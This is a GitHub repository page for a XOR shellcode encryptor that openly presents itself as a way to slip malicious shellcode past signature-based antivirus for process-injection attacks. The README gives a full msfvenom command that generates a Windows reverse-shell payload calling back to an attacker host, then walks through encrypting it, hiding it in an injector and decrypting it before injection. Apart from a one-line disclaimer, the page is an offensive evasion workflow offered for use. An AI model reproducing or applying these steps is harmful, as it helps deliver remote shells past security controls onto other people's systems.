Skip to content

This repository contains xor shellcode encryptor that is used to bypass static or signature based detection of malicious shellcodes for Process Injection exploits

Notifications You must be signed in to change notification settings

shaddy43/XOR_Shellcode_Encryptor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

This repository contains a tool that can encrypt all type of files and give the encrypted output in the form of an encrypted shellcode. Process of encrypting shellcode is very important for injection processes to bypass signature based detection by the security controls. Consider an example of using a highly detected metasploit backdoor shellcode. Now for injecting such a shellcode, we need obfuscation to bypass detection by antiviruses. This tool helps us in encrypting that shellcode which will be saved in the injector and decrypted just before injection.

DISCLAIMER: For security testing and educational purposes only !!!

Example:

create a metasploit shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f raw -o shellcode.bin enceypt it with this tool: XOR_Shellcode_Encryptor.exe shellcode.bin encrypted_code.txt mySecretEncryptionKey add encrypted shellcode inside the injector decrypt it with the key before injection

About

This repository contains xor shellcode encryptor that is used to bypass static or signature based detection of malicious shellcodes for Process Injection exploits

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages